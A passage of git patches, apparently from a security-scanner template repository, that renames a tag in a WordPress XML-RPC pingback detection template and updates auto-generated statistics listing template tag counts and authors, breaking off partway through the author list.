a/vulnerabilities/wordpress/wp-xmlrpc-pingback-detection.yaml b/vulnerabilities/wordpress/wp-xmlrpc-pingback-detection.yaml index da1277e0fb..c81a051e5d 100644 --- a/vulnerabilities/wordpress/wp-xmlrpc-pingback-detection.yaml +++ b/vulnerabilities/wordpress/wp-xmlrpc-pingback-detection.yaml @@ -4,7 +4,7 @@ info: name: Wordpress XMLRPC Pingback detection author: pdteam severity: info - tags: wordpress,ssrf,oob + tags: wordpress,ssrf,oast reference: - https://github.com/dorkerdevil/rpckiller - https://the-bilal-rizwan.medium.com/wordpress-xmlrpc-php-common-vulnerabilites-how-to-exploit-them-d8d3c8600b32 From ecf4ed15f70c87ac34246b97c627020d1d7778ed Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 18 Oct 2021 20:41:11 +0000 Subject: [PATCH 3014/4083] Auto Generated Templates Stats [Mon Oct 18 20:41:11 UTC 2021] :robot: --- TEMPLATES-STATS.json | 2 +- TEMPLATES-STATS.md | 1788 +++++++++++++++++++++--------------------- TOP-10.md | 10 +- 3 files changed, 900 insertions(+), 900 deletions(-) diff --git a/TEMPLATES-STATS.json b/TEMPLATES-STATS.json index 3b3ab8672e..d6eb666918 100644 --- a/TEMPLATES-STATS.json +++ b/TEMPLATES-STATS.json @@ -1 +1 @@ -{"tags":[{"name":"cve","count":832},{"name":"lfi","count":342},{"name":"panel","count":272},{"name":"xss","count":258},{"name":"wordpress","count":252},{"name":"exposure","count":240},{"name":"rce","count":214},{"name":"tech","count":197},{"name":"wp-plugin","count":175},{"name":"cve2020","count":164},{"name":"cve2021","count":155},{"name":"joomla","count":128},{"name":"cve2010","count":109},{"name":"cve2019","count":97},{"name":"config","count":95},{"name":"cve2018","count":92},{"name":"apache","count":73},{"name":"iot","count":70},{"name":"takeover","count":69},{"name":"default-login","count":68},{"name":"oob","count":68},{"name":"token","count":67},{"name":"token-spray","count":63},{"name":"cve2017","count":51},{"name":"file","count":50},{"name":"unauth","count":49},{"name":"network","count":43},{"name":"ssrf","count":41},{"name":"sqli","count":40},{"name":"","count":38},{"name":"cve2016","count":37},{"name":"redirect","count":37},{"name":"oracle","count":36},{"name":"logs","count":30},{"name":"google","count":30},{"name":"atlassian","count":29},{"name":"jira","count":29},{"name":"cve2015","count":29},{"name":"listing","count":27},{"name":"cisco","count":27},{"name":"cve2014","count":27},{"name":"generic","count":24},{"name":"auth-bypass","count":23},{"name":"disclosure","count":23},{"name":"misc","count":23},{"name":"router","count":22},{"name":"misconfig","count":22},{"name":"aem","count":19},{"name":"springboot","count":18},{"name":"debug","count":18},{"name":"sap","count":18},{"name":"cve2012","count":18},{"name":"php","count":16},{"name":"devops","count":15},{"name":"cve2011","count":15},{"name":"weblogic","count":14},{"name":"fuzz","count":14},{"name":"aws","count":14},{"name":"login","count":14},{"name":"cve2009","count":14},{"name":"struts","count":14},{"name":"zoho","count":13},{"name":"deserialization","count":13},{"name":"android","count":13},{"name":"dns","count":13},{"name":"adobe","count":13},{"name":"dlink","count":13},{"name":"wp-theme","count":12},{"name":"manageengine","count":12},{"name":"jenkins","count":12},{"name":"cve2013","count":11},{"name":"magento","count":11},{"name":"intrusive","count":10},{"name":"xxe","count":10},{"name":"hp","count":10},{"name":"dell","count":10},{"name":"kubernetes","count":9},{"name":"ftp","count":9},{"name":"vmware","count":9},{"name":"cve2008","count":8},{"name":"fastjson","count":8},{"name":"rails","count":8},{"name":"nginx","count":8},{"name":"ibm","count":8},{"name":"gitlab","count":8},{"name":"scada","count":8},{"name":"microsoft","count":8},{"name":"cnvd","count":8},{"name":"backup","count":8},{"name":"airflow","count":8},{"name":"ruijie","count":8},{"name":"confluence","count":7},{"name":"files","count":7},{"name":"cms","count":7},{"name":"coldfusion","count":7},{"name":"netgear","count":7},{"name":"rconfig","count":6},{"name":"laravel","count":6},{"name":"drupal","count":6},{"name":"nodejs","count":6},{"name":"citrix","count":6},{"name":"camera","count":6},{"name":"solr","count":6},{"name":"phpmyadmin","count":6},{"name":"lucee","count":6},{"name":"docker","count":6},{"name":"fileupload","count":6},{"name":"api","count":6},{"name":"django","count":6},{"name":"jetty","count":6},{"name":"jolokia","count":5},{"name":"printer","count":5},{"name":"java","count":5},{"name":"dedecms","count":5},{"name":"circarlife","count":5},{"name":"ssti","count":5},{"name":"iis","count":5},{"name":"crlf","count":5},{"name":"tomcat","count":5},{"name":"headless","count":5},{"name":"windows","count":5},{"name":"thinkcmf","count":4},{"name":"samsung","count":4},{"name":"firmware","count":4},{"name":"npm","count":4},{"name":"zimbra","count":4},{"name":"resin","count":4},{"name":"magmi","count":4},{"name":"artifactory","count":4},{"name":"elastic","count":4},{"name":"git","count":4},{"name":"hongdian","count":4},{"name":"traversal","count":4},{"name":"vpn","count":4},{"name":"slack","count":4},{"name":"thinkphp","count":4},{"name":"maps","count":4},{"name":"asp","count":4},{"name":"symfony","count":4},{"name":"firebase","count":4},{"name":"moodle","count":4},{"name":"solarwinds","count":4},{"name":"exchange","count":4},{"name":"grafana","count":4},{"name":"rfi","count":4},{"name":"fatpipe","count":4},{"name":"symantec","count":4},{"name":"wso2","count":4},{"name":"zabbix","count":4},{"name":"buffalo","count":4},{"name":"webserver","count":4},{"name":"glpi","count":4},{"name":"strapi","count":4},{"name":"amazon","count":4},{"name":"proxy","count":4},{"name":"ssh","count":3},{"name":"httpd","count":3},{"name":"microstrategy","count":3},{"name":"log","count":3},{"name":"injection","count":3},{"name":"cloud","count":3},{"name":"bigip","count":3},{"name":"nexus","count":3},{"name":"kibana","count":3},{"name":"smtp","count":3},{"name":"jellyfin","count":3},{"name":"linkerd","count":3},{"name":"itop","count":3},{"name":"springcloud","count":3},{"name":"telerik","count":3},{"name":"jeesns","count":3},{"name":"search","count":3},{"name":"lansweeper","count":3},{"name":"zhiyuan","count":3},{"name":"bitrix","count":3},{"name":"node","count":3},{"name":"exposures","count":3},{"name":"fpd","count":3},{"name":"terramaster","count":3},{"name":"sonicwall","count":3},{"name":"mongodb","count":3},{"name":"kevinlab","count":3},{"name":"cves","count":3},{"name":"openam","count":3},{"name":"ofbiz","count":3},{"name":"cve2007","count":3},{"name":"targa","count":3},{"name":"azure","count":3},{"name":"fanruan","count":3},{"name":"oa","count":3},{"name":"mail","count":3},{"name":"caucho","count":3},{"name":"vbulletin","count":3},{"name":"ebs","count":3},{"name":"r-seenet","count":3},{"name":"cacti","count":3},{"name":"lfr","count":3},{"name":"druid","count":3},{"name":"opensis","count":3},{"name":"kafka","count":3},{"name":"nacos","count":3},{"name":"openssh","count":3},{"name":"github","count":3},{"name":"prometheus","count":3},{"name":"hoteldruid","count":3},{"name":"nosqli","count":3},{"name":"backdoor","count":3},{"name":"tikiwiki","count":3},{"name":"igs","count":2},{"name":"wuzhicms","count":2},{"name":"backups","count":2},{"name":"vcenter","count":2},{"name":"payara","count":2},{"name":"upload","count":2},{"name":"cve2005","count":2},{"name":"hasura","count":2},{"name":"yii","count":2},{"name":"flir","count":2},{"name":"db","count":2},{"name":"hpe","count":2},{"name":"geowebserver","count":2},{"name":"akkadian","count":2},{"name":"ecoa","count":2},{"name":"places","count":2},{"name":"bypass","count":2},{"name":"hashicorp","count":2},{"name":"status","count":2},{"name":"akamai","count":2},{"name":"odoo","count":2},{"name":"rancher","count":2},{"name":"avantfax","count":2},{"name":"waf","count":2},{"name":"chyrp","count":2},{"name":"jeedom","count":2},{"name":"mcafee","count":2},{"name":"aviatrix","count":2},{"name":"wordfence","count":2},{"name":"bitly","count":2},{"name":"totemomail","count":2},{"name":"getsimple","count":2},{"name":"minio","count":2},{"name":"justwriting","count":2},{"name":"spark","count":2},{"name":"glassfish","count":2},{"name":"grav","count":2},{"name":"linux","count":2},{"name":"service","count":2},{"name":"axis","count":2},{"name":"qihang","count":2},{"name":"commax","count":2},{"name":"couchdb","count":2},{"name":"netsweeper","count":2},{"name":"huawei","count":2},{"name":"jsf","count":2},{"name":"hostheader-injection","count":2},{"name":"jboss","count":2},{"name":"nextjs","count":2},{"name":"harbor","count":2},{"name":"hjtcloud","count":2},{"name":"tidb","count":2},{"name":"icewarp","count":2},{"name":"yapi","count":2},{"name":"sitecore","count":2},{"name":"kong","count":2},{"name":"shellshock","count":2},{"name":"text","count":2},{"name":"lotus","count":2},{"name":"idrac","count":2},{"name":"saltstack","count":2},{"name":"netis","count":2},{"name":"storage","count":2},{"name":"seeyon","count":2},{"name":"keycloak","count":2},{"name":"rockmongo","count":2},{"name":"horde","count":2},{"name":"chiyu","count":2},{"name":"chamilo","count":2},{"name":"nextcloud","count":2},{"name":"paloalto","count":2},{"name":"phpcollab","count":2},{"name":"showdoc","count":2},{"name":"electron","count":2},{"name":"emerge","count":2},{"name":"trixbox","count":2},{"name":"openvpn","count":2},{"name":"embed","count":2},{"name":"globalprotect","count":2},{"name":"guacamole","count":2},{"name":"axis2","count":2},{"name":"mailchimp","count":2},{"name":"adminer","count":2},{"name":"ucmdb","count":2},{"name":"liferay","count":2},{"name":"favicon","count":2},{"name":"sharepoint","count":2},{"name":"prestashop","count":2},{"name":"bucket","count":2},{"name":"webcam","count":2},{"name":"vrealize","count":2},{"name":"plesk","count":2},{"name":"kentico","count":2},{"name":"enumeration","count":2},{"name":"rstudio","count":2},{"name":"maian","count":2},{"name":"openfire","count":2},{"name":"frp","count":2},{"name":"voipmonitor","count":2},{"name":"heroku","count":2},{"name":"pega","count":2},{"name":"bruteforce","count":2},{"name":"ecology","count":2},{"name":"nagios","count":2},{"name":"aruba","count":2},{"name":"smb","count":2},{"name":"activemq","count":2},{"name":"ec2","count":2},{"name":"fortios","count":2},{"name":"mida","count":2},{"name":"xxljob","count":2},{"name":"oauth","count":2},{"name":"qcubed","count":2},{"name":"dos","count":2},{"name":"middleware","count":2},{"name":"s3","count":2},{"name":"prtg","count":2},{"name":"dolibarr","count":2},{"name":"cache","count":2},{"name":"splunk","count":2},{"name":"ilo","count":2},{"name":"leak","count":2},{"name":"natshell","count":2},{"name":"sonarqube","count":2},{"name":"sentry","count":1},{"name":"digitalocean","count":1},{"name":"jsp","count":1},{"name":"goahead","count":1},{"name":"speed","count":1},{"name":"pgadmin","count":1},{"name":"episerver","count":1},{"name":"gitea","count":1},{"name":"exponentcms","count":1},{"name":"webmin","count":1},{"name":"proftpd","count":1},{"name":"ecom","count":1},{"name":"yzmcms","count":1},{"name":"beanstalk","count":1},{"name":"nette","count":1},{"name":"vidyo","count":1},{"name":"landrayoa","count":1},{"name":"azkaban","count":1},{"name":"cloudflare","count":1},{"name":"owasp","count":1},{"name":"hiboss","count":1},{"name":"tinypng","count":1},{"name":"biometrics","count":1},{"name":"novnc","count":1},{"name":"phpfastcache","count":1},{"name":"phalcon","count":1},{"name":"starttls","count":1},{"name":"placeos","count":1},{"name":"plone","count":1},{"name":"elascticsearch","count":1},{"name":"iceflow","count":1},{"name":"cves2001","count":1},{"name":"remkon","count":1},{"name":"tcexam","count":1},{"name":"olivetti","count":1},{"name":"expressjs","count":1},{"name":"vscode","count":1},{"name":"graylog","count":1},{"name":"buildkite","count":1},{"name":"xvr","count":1},{"name":"iptime","count":1},{"name":"javascript","count":1},{"name":"mautic","count":1},{"name":"octoprint","count":1},{"name":"camunda","count":1},{"name":"tensorflow","count":1},{"name":"oscommerce","count":1},{"name":"qsan","count":1},{"name":"vnc","count":1},{"name":"couchbase","count":1},{"name":"blackboard","count":1},{"name":"mod-proxy","count":1},{"name":"twitter","count":1},{"name":"acexy","count":1},{"name":"axiom","count":1},{"name":"frontpage","count":1},{"name":"chinaunicom","count":1},{"name":"cors","count":1},{"name":"qvisdvr","count":1},{"name":"sgp","count":1},{"name":"moin","count":1},{"name":"sendgrid","count":1},{"name":"dnssec","count":1},{"name":"landray","count":1},{"name":"spip","count":1},{"name":"circontrorl","count":1},{"name":"messaging","count":1},{"name":"swagger","count":1},{"name":"testrail","count":1},{"name":"hadoop","count":1},{"name":"esmtp","count":1},{"name":"rujjie","count":1},{"name":"labtech","count":1},{"name":"sql","count":1},{"name":"wildfly","count":1},{"name":"phpunit","count":1},{"name":"visualtools","count":1},{"name":"fuelcms","count":1},{"name":"rdp","count":1},{"name":"elfinder","count":1},{"name":"openx","count":1},{"name":"zyxel","count":1},{"name":"pacsone","count":1},{"name":"servicedesk","count":1},{"name":"zenario","count":1},{"name":"zmanda","count":1},{"name":"glances","count":1},{"name":"octobercms","count":1},{"name":"blind","count":1},{"name":"expose","count":1},{"name":"sage","count":1},{"name":"redhat","count":1},{"name":"zarafa","count":1},{"name":"socomec","count":1},{"name":"details","count":1},{"name":"anchorcms","count":1},{"name":"perl","count":1},{"name":"cloudinary","count":1},{"name":"totaljs","count":1},{"name":"jenkin","count":1},{"name":"panos","count":1},{"name":"grails","count":1},{"name":"artica","count":1},{"name":"faraday","count":1},{"name":"sprintful","count":1},{"name":"solarlog","count":1},{"name":"bookstack","count":1},{"name":"oidc","count":1},{"name":"discord","count":1},{"name":"webadmin","count":1},{"name":"codeigniter","count":1},{"name":"cerebro","count":1},{"name":"mobileiron","count":1},{"name":"meraki","count":1},{"name":"postgres","count":1},{"name":"simplecrm","count":1},{"name":"tongda","count":1},{"name":"nifi","count":1},{"name":"spring","count":1},{"name":"vsftpd","count":1},{"name":"rocketchat","count":1},{"name":"dotnetnuke","count":1},{"name":"tieline","count":1},{"name":"openemr","count":1},{"name":"trane","count":1},{"name":"addpac","count":1},{"name":"clave","count":1},{"name":"pyramid","count":1},{"name":"email","count":1},{"name":"wavlink","count":1},{"name":"emc","count":1},{"name":"alerta","count":1},{"name":"wing-ftp","count":1},{"name":"jumpcloud","count":1},{"name":"shopxo","count":1},{"name":"sophos","count":1},{"name":"processmaker","count":1},{"name":"sco","count":1},{"name":"auth","count":1},{"name":"gurock","count":1},{"name":"gespage","count":1},{"name":"secmail","count":1},{"name":"geocode","count":1},{"name":"acontent","count":1},{"name":"idemia","count":1},{"name":"ssl","count":1},{"name":"mkdocs","count":1},{"name":"eyou","count":1},{"name":"visualstudio","count":1},{"name":"feifeicms","count":1},{"name":"svn","count":1},{"name":"lancom","count":1},{"name":"redmine","count":1},{"name":"basic-auth","count":1},{"name":"clink-office","count":1},{"name":"jmx","count":1},{"name":"zzzcms","count":1},{"name":"mongo","count":1},{"name":"deviantart","count":1},{"name":"xampp","count":1},{"name":"fastapi","count":1},{"name":"vsphere","count":1},{"name":"uwsgi","count":1},{"name":"cofax","count":1},{"name":"htmli","count":1},{"name":"iterable","count":1},{"name":"openerp","count":1},{"name":"panasonic","count":1},{"name":"skywalking","count":1},{"name":"nc2","count":1},{"name":"mirai","count":1},{"name":"ssltls","count":1},{"name":"drone","count":1},{"name":"magicflow","count":1},{"name":"upnp","count":1},{"name":"empirecms","count":1},{"name":"primetek","count":1},{"name":"tracer","count":1},{"name":"redis","count":1},{"name":"circontrol","count":1},{"name":"dropbox","count":1},{"name":"tpshop","count":1},{"name":"circleci","count":1},{"name":"floc","count":1},{"name":"shopizer","count":1},{"name":"nimble","count":1},{"name":"photo","count":1},{"name":"fortinet","count":1},{"name":"cgi","count":1},{"name":"gridx","count":1},{"name":"gitlist","count":1},{"name":"netrc","count":1},{"name":"avalanche","count":1},{"name":"haproxy","count":1},{"name":"cockpit","count":1},{"name":"metinfo","count":1},{"name":"bolt","count":1},{"name":"yealink","count":1},{"name":"froxlor","count":1},{"name":"graphite","count":1},{"name":"skycaiji","count":1},{"name":"autocomplete","count":1},{"name":"gsoap","count":1},{"name":"redcap","count":1},{"name":"emby","count":1},{"name":"contentkeeper","count":1},{"name":"maxsite","count":1},{"name":"interlib","count":1},{"name":"distance","count":1},{"name":"clockwatch","count":1},{"name":"servicenow","count":1},{"name":"tjws","count":1},{"name":"javafaces","count":1},{"name":"weather","count":1},{"name":"pivotaltracker","count":1},{"name":"actuator","count":1},{"name":"locations","count":1},{"name":"arl","count":1},{"name":"zcms","count":1},{"name":"miscrsoft","count":1},{"name":"websvn","count":1},{"name":"adb","count":1},{"name":"cscart","count":1},{"name":"panabit","count":1},{"name":"monitorr","count":1},{"name":"gloo","count":1},{"name":"svnserve","count":1},{"name":"optiLink","count":1},{"name":"centos","count":1},{"name":"shopware","count":1},{"name":"maccmsv10","count":1},{"name":"aspnuke","count":1},{"name":"api-manager","count":1},{"name":"clickhouse","count":1},{"name":"hubspot","count":1},{"name":"find","count":1},{"name":"mailgun","count":1},{"name":"huijietong","count":1},{"name":"opm","count":1},{"name":"razor","count":1},{"name":"solman","count":1},{"name":"commscope","count":1},{"name":"tugboat","count":1},{"name":"viewlinc","count":1},{"name":"woocomernce","count":1},{"name":"codemeter","count":1},{"name":"dbeaver","count":1},{"name":"linkedin","count":1},{"name":"xunchi","count":1},{"name":"parentlink","count":1},{"name":"burp","count":1},{"name":"nomad","count":1},{"name":"buttercms","count":1},{"name":"dompdf","count":1},{"name":"tika","count":1},{"name":"jaspersoft","count":1},{"name":"ioncube","count":1},{"name":"place","count":1},{"name":"nexusdb","count":1},{"name":"geutebruck","count":1},{"name":"bash","count":1},{"name":"keenetic","count":1},{"name":"myucms","count":1},{"name":"mara","count":1},{"name":"office365","count":1},{"name":"fortiweb","count":1},{"name":"sqlite","count":1},{"name":"tileserver","count":1},{"name":"postmessage","count":1},{"name":"bedita","count":1},{"name":"logontracer","count":1},{"name":"shoretel","count":1},{"name":"phpfusion","count":1},{"name":"phpshowtime","count":1},{"name":"fortilogger","count":1},{"name":"announcekit","count":1},{"name":"tenda","count":1},{"name":"spectracom","count":1},{"name":"comodo","count":1},{"name":"xiuno","count":1},{"name":"adiscon","count":1},{"name":"karel","count":1},{"name":"calendarix","count":1},{"name":"pcoip","count":1},{"name":"mantis","count":1},{"name":"lotuscms","count":1},{"name":"centreon","count":1},{"name":"fastcgi","count":1},{"name":"opencast","count":1},{"name":"extractor","count":1},{"name":"okta","count":1},{"name":"package","count":1},{"name":"wooyun","count":1},{"name":"argussurveillance","count":1},{"name":"natemail","count":1},{"name":"qdpm","count":1},{"name":"eprints","count":1},{"name":"acme","count":1},{"name":"ruckus","count":1},{"name":"csrfguard","count":1},{"name":"thinkadmin","count":1},{"name":"pulsesecure","count":1},{"name":"webftp","count":1},{"name":"postmark","count":1},{"name":"powercreator","count":1},{"name":"k8","count":1},{"name":"manager","count":1},{"name":"kubeflow","count":1},{"name":"route","count":1},{"name":"spidercontrol","count":1},{"name":"alibaba","count":1},{"name":"tor","count":1},{"name":"zte","count":1},{"name":"saltapi","count":1},{"name":"twitter-server","count":1},{"name":"wakatime","count":1},{"name":"bing","count":1},{"name":"node-red-dashboard","count":1},{"name":"ems","count":1},{"name":"youtube","count":1},{"name":"turbocrm","count":1},{"name":"gilacms","count":1},{"name":"synnefo","count":1},{"name":"portainer","count":1},{"name":"cse","count":1},{"name":"moinmoin","count":1},{"name":"accela","count":1},{"name":"cobub","count":1},{"name":"sidekiq","count":1},{"name":"ipstack","count":1},{"name":"omi","count":1},{"name":"st","count":1},{"name":"nearby","count":1},{"name":"calendly","count":1},{"name":"geddy","count":1},{"name":"wiki","count":1},{"name":"ntopng","count":1},{"name":"cyberoam","count":1},{"name":"expn","count":1},{"name":"k8s","count":1},{"name":"memcached","count":1},{"name":"checkpoint","count":1},{"name":"rmi","count":1},{"name":"sceditor","count":1},{"name":"ognl","count":1},{"name":"etherpad","count":1},{"name":"dvwa","count":1},{"name":"wifisky","count":1},{"name":"hortonworks","count":1},{"name":"erp-nc","count":1},{"name":"phpwiki","count":1},{"name":"glowroot","count":1},{"name":"weiphp","count":1},{"name":"elasticsearch","count":1},{"name":"seacms","count":1},{"name":"sangfor","count":1},{"name":"zms","count":1},{"name":"finereport","count":1},{"name":"selea","count":1},{"name":"owa","count":1},{"name":"clusterengine","count":1},{"name":"varnish","count":1},{"name":"roads","count":1},{"name":"pendo","count":1},{"name":"apiman","count":1},{"name":"timesheet","count":1},{"name":"cherokee","count":1},{"name":"b2evolution","count":1},{"name":"mantisbt","count":1},{"name":"ambari","count":1},{"name":"smartsense","count":1},{"name":"lg-nas","count":1},{"name":"cve202","count":1},{"name":"ns","count":1},{"name":"avtech","count":1},{"name":"realteo","count":1},{"name":"viewpoint","count":1},{"name":"embedthis","count":1},{"name":"nps","count":1},{"name":"ricoh","count":1},{"name":"asus","count":1},{"name":"eg","count":1},{"name":"redwood","count":1},{"name":"fortigate","count":1},{"name":"xml","count":1},{"name":"timezone","count":1},{"name":"opentsdb","count":1},{"name":"wamp","count":1},{"name":"fedora","count":1},{"name":"gogs","count":1},{"name":"chevereto","count":1},{"name":"mariadb","count":1},{"name":"mpsec","count":1},{"name":"subrion","count":1},{"name":"zookeeper","count":1},{"name":"plastic","count":1},{"name":"graphql","count":1},{"name":"jenzabar","count":1},{"name":"csrf","count":1},{"name":"limit","count":1},{"name":"soar","count":1},{"name":"plc","count":1},{"name":"linksys","count":1},{"name":"nedi","count":1},{"name":"spotify","count":1},{"name":"zm","count":1},{"name":"visionhub","count":1},{"name":"traefik","count":1},{"name":"sarg","count":1},{"name":"metabase","count":1},{"name":"jitsi","count":1},{"name":"mapbox","count":1},{"name":"mysql","count":1},{"name":"achecker","count":1},{"name":"mongoshake","count":1},{"name":"clockwork","count":1},{"name":"ulterius","count":1},{"name":"lutron","count":1},{"name":"ganglia","count":1},{"name":"pippoint","count":1},{"name":"appweb","count":1},{"name":"dvr","count":1},{"name":"netmask","count":1},{"name":"mediumish","count":1},{"name":"woocommerce","count":1},{"name":"h3c-imc","count":1},{"name":"ewebs","count":1},{"name":"myvuehelp","count":1},{"name":"lighttpd","count":1},{"name":"zend","count":1},{"name":"syslog","count":1},{"name":"rmc","count":1},{"name":"duomicms","count":1},{"name":"sar2html","count":1},{"name":"raspap","count":1},{"name":"opensmtpd","count":1},{"name":"klog","count":1},{"name":"shiro","count":1},{"name":"websphere","count":1},{"name":"diris","count":1},{"name":"listserv","count":1},{"name":"dom","count":1},{"name":"wazuh","count":1},{"name":"kerbynet","count":1},{"name":"rsyncd","count":1},{"name":"netdata","count":1},{"name":"xmlchart","count":1},{"name":"gunicorn","count":1},{"name":"minimouse","count":1},{"name":"crm","count":1},{"name":"majordomo2","count":1},{"name":"beanshell","count":1},{"name":"trilithic","count":1},{"name":"74cms","count":1},{"name":"lokalise","count":1},{"name":"triconsole","count":1},{"name":"tensorboard","count":1},{"name":"etouch","count":1},{"name":"monitorix","count":1},{"name":"smi","count":1},{"name":"bingmaps","count":1},{"name":"terraform","count":1},{"name":"asana","count":1},{"name":"stem","count":1},{"name":"mdb","count":1},{"name":"nerdgraph","count":1},{"name":"database","count":1},{"name":"loqate","count":1},{"name":"jquery","count":1},{"name":"pmb","count":1},{"name":"bigbluebutton","count":1},{"name":"ghost","count":1},{"name":"hiawatha","count":1},{"name":"pagespeed","count":1},{"name":"oneblog","count":1},{"name":"circle","count":1},{"name":"kindeditor","count":1},{"name":"cloudron","count":1},{"name":"tamronos","count":1},{"name":"bullwark","count":1},{"name":"mrtg","count":1},{"name":"werkzeug","count":1},{"name":"dotnet","count":1},{"name":"newrelic","count":1},{"name":"key","count":1},{"name":"gotmls","count":1},{"name":"blue-ocean","count":1},{"name":"bazarr","count":1},{"name":" default-login","count":1},{"name":"cocoon","count":1},{"name":"wmt","count":1},{"name":"gateone","count":1},{"name":"doh","count":1},{"name":"timeclock","count":1},{"name":"jeewms","count":1},{"name":"kyan","count":1},{"name":"pihole","count":1},{"name":"craftcms","count":1},{"name":"daybyday","count":1},{"name":"flexbe","count":1},{"name":"sureline","count":1},{"name":"netgenie","count":1},{"name":"smartblog","count":1},{"name":"travis","count":1},{"name":"imap","count":1},{"name":"matrix","count":1},{"name":"ueditor","count":1},{"name":"openrestry","count":1},{"name":"lanproxy","count":1},{"name":"rabbitmq","count":1},{"name":"nuxeo","count":1},{"name":"webui","count":1},{"name":"sonarcloud","count":1},{"name":"rhymix","count":1},{"name":"wondercms","count":1},{"name":"default","count":1},{"name":"jnoj","count":1},{"name":"shoppable","count":1},{"name":"weglot","count":1},{"name":"pagerduty","count":1},{"name":"loganalyzer","count":1},{"name":"playable","count":1},{"name":"phpinfo","count":1},{"name":"geolocation","count":1},{"name":"influxdb","count":1},{"name":"instagram","count":1},{"name":"plugin","count":1},{"name":"javamelody","count":1},{"name":"resourcespace","count":1},{"name":"streetview","count":1},{"name":"rockethchat","count":1},{"name":"domxss","count":1},{"name":"wavemaker","count":1},{"name":"alertmanager","count":1},{"name":"apos","count":1},{"name":"xdcms","count":1},{"name":"ruby","count":1},{"name":"sourcebans","count":1},{"name":"zeroshell","count":1},{"name":"motorola","count":1},{"name":"openweather","count":1},{"name":"exacqvision","count":1},{"name":"luftguitar","count":1},{"name":"rubedo","count":1},{"name":"robomongo","count":1},{"name":"nsasg","count":1},{"name":"scs","count":1},{"name":"nweb2fax","count":1},{"name":"okiko","count":1},{"name":"concrete","count":1},{"name":"nuuo","count":1},{"name":"dotclear","count":1},{"name":"flink","count":1},{"name":"livezilla","count":1},{"name":"fcm","count":1},{"name":"cve2006","count":1},{"name":"whm","count":1},{"name":"aura","count":1},{"name":"nordex","count":1},{"name":"ilo4","count":1},{"name":"scimono","count":1},{"name":"tectuus","count":1},{"name":"graph","count":1},{"name":"csod","count":1},{"name":"webmodule-ee","count":1},{"name":"kafdrop","count":1},{"name":"opensns","count":1},{"name":"discourse","count":1},{"name":"stripe","count":1},{"name":"salesforce","count":1},{"name":"tapestry","count":1},{"name":"darkstat","count":1},{"name":"setup","count":1},{"name":"gstorage","count":1},{"name":"krweb","count":1},{"name":"yachtcontrol","count":1},{"name":"eyelock","count":1},{"name":"directions","count":1},{"name":"elevation","count":1},{"name":"fortigates","count":1},{"name":"fiori","count":1},{"name":"square","count":1},{"name":"openstack","count":1},{"name":"szhe","count":1},{"name":"springframework","count":1},{"name":"jfrog","count":1},{"name":"spf","count":1}],"authors":[{"name":"daffainfo","count":288},{"name":"pikpikcu","count":281},{"name":"dhiyaneshdk","count":278},{"name":"pdteam","count":201},{"name":"geeknik","count":162},{"name":"dwisiswant0","count":131},{"name":"gy741","count":81},{"name":"pussycat0x","count":72},{"name":"princechaddha","count":67},{"name":"madrobot","count":63},{"name":"zzeitlin","count":63},{"name":"0x_akoko","count":53},{"name":"gaurang","count":42},{"name":"philippedelteil","count":29},{"name":"ice3man","count":26},{"name":"organiccrap","count":24},{"name":"pr3r00t","count":15},{"name":"sheikhrishad","count":15},{"name":"milo2012","count":14},{"name":"techbrunchfr","count":13},{"name":"suman_kar","count":12},{"name":"r3dg33k","count":11},{"name":"cyllective","count":11},{"name":"righettod","count":10},{"name":"wdahlenb","count":10},{"name":"melbadry9","count":10},{"name":"random_robbie","count":10},{"name":"nadino","count":10},{"name":"hackergautam","count":9},{"name":"that_juan_","count":8},{"name":"zh","count":8},{"name":"aashiq","count":8},{"name":"iamthefrogy","count":8},{"name":"kophjager007","count":7},{"name":"dogasantos","count":7},{"name":"dr_set","count":7},{"name":"techryptic (@tech)","count":7},{"name":"harshbothra_","count":7},{"name":"meme-lord","count":7},{"name":"emadshanab","count":7},{"name":"randomstr1ng","count":7},{"name":"0x240x23elu","count":7},{"name":"oppsec","count":7},{"name":"puzzlepeaches","count":6},{"name":"__fazal","count":6},{"name":"logicalhunter","count":6},{"name":"divya_mudgal","count":6},{"name":"caspergn","count":6},{"name":"pentest_swissky","count":6},{"name":"panch0r3d","count":5},{"name":"yanyun","count":5},{"name":"elsfa7110","count":5},{"name":"ganofins","count":5},{"name":"rootxharsh","count":5},{"name":"iamnoooob","count":5},{"name":"xelkomy","count":5},{"name":"joanbono","count":5},{"name":"lu4nx","count":5},{"name":"johnk3r","count":5},{"name":"github.com/its0x08","count":4},{"name":"e_schultze_","count":4},{"name":"nodauf","count":4},{"name":"wisnupramoedya","count":4},{"name":"incogbyte","count":4},{"name":"tess","count":4},{"name":"skeltavik","count":3},{"name":"_generic_human_","count":3},{"name":"idealphase","count":3},{"name":"impramodsargar","count":3},{"name":"thomas_from_offensity","count":3},{"name":"dudez","count":3},{"name":"me9187","count":3},{"name":"fyoorer","count":3},{"name":"0w4ys","count":3},{"name":"yash anand @yashanand155","count":3},{"name":"z3bd","count":3},{"name":"sullo","count":3},{"name":"sushantkamble","count":3},{"name":"shine","count":3},{"name":"shifacyclewala","count":3},{"name":"mavericknerd","count":3},{"name":"vsh00t","count":3},{"name":"johnjhacking","count":3},{"name":"unstabl3","count":3},{"name":"jarijaas","count":3},{"name":"emenalf","count":3},{"name":"binaryfigments","count":3},{"name":"f1tz","count":3},{"name":"pxmme1337","count":2},{"name":"0xrudra","count":2},{"name":"gal nagli","count":2},{"name":"0xsmiley","count":2},{"name":"fabaff","count":2},{"name":"0xsapra","count":2},{"name":"0xcrypto","count":2},{"name":"g4l1t0","count":2},{"name":"foulenzer","count":2},{"name":"mahendra purbia (mah3sec_)","count":2},{"name":"whoever","count":2},{"name":"amsda","count":2},{"name":"bing0o","count":2},{"name":"parth","count":2},{"name":"w4cky_","count":2},{"name":"manas_harsh","count":2},{"name":"ehsahil","count":2},{"name":"sy3omda","count":2},{"name":"convisoappsec","count":2},{"name":"r3naissance","count":2},{"name":"r12w4n","count":2},{"name":"bernardofsr","count":2},{"name":"cocxanh","count":2},{"name":"swissky","count":2},{"name":"huowuzhao","count":2},{"name":"hahwul","count":2},{"name":"kiblyn11","count":2},{"name":"koti2","count":2},{"name":"ree4pwn","count":2},{"name":"gevakun","count":2},{"name":"lotusdll","count":2},{"name":"moritz 